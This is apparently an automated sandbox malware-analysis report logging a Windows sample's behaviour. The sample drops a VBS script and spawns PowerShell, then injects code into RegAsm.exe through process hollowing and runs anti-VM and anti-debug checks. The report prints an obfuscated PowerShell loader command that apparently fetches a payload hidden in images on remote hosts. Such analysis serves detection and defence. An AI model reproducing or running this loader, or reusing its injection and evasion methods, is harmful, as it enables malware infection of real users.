                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2296
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_33-54479
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2470
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-2610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.5 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 4231 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 5620 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep count: 533 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep count: 7219 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 520Thread sleep count: 2296 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A6204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7D2A6204C
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_004062D5 FindFirstFileW,FindClose,11_2_004062D5
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_00402E18 FindFirstFileW,11_2_00402E18
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,11_2_00406C9B
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636342034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,15_2_00007FF636342034
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,33_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,33_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,33_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407877 FindFirstFileW,FindNextFileW,33_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044E8F9 FindFirstFileExA,33_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,33_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,33_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,33_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,33_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_10006580 FindFirstFileExA,33_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040AE51 FindFirstFileW,FindNextFileW,37_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,38_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,40_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,33_2_00407CD2
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A664E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7D2A664E4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEFile opened: C:\Users\userJump to behavior
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B78DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1714325492.000001D827F9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@qG
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: RegAsm.exe, 00000009.00000002.1533827567.0000000001475000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.1767314740.0000000001324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: RegAsm.exe, 00000021.00000002.1767314740.0000000001324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: wscript.exe, 00000004.00000002.1335849057.000001DF2C149000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\4
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B7A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000007.00000002.1453521451.000001F6B94E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,37_2_0040DD85
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A630EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7D2A630EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00443355 mov eax, dword ptr fs:[00000030h]33_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_10004AB4 mov eax, dword ptr fs:[00000030h]33_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,33_2_00411D39
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A68494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7D2A68494
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A68790 SetUnhandledExceptionFilter,0_2_00007FF7D2A68790
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636348714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF636348714
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeCode function: 15_2_00007FF636348A1E SetUnhandledExceptionFilter,15_2_00007FF636348A1E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434BD8 SetUnhandledExceptionFilter,33_2_00434BD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi64_7696.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi64_1280.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1280, type: MEMORYSTR
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, Program.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, Program.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                      Source: 7.2.powershell.exe.1f6b3700000.0.raw.unpack, Program.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,33_2_0041812A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40B000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 411000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 412000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 413000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 414000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1118008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EED008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe33_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00419662 mouse_event,33_2_00419662
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
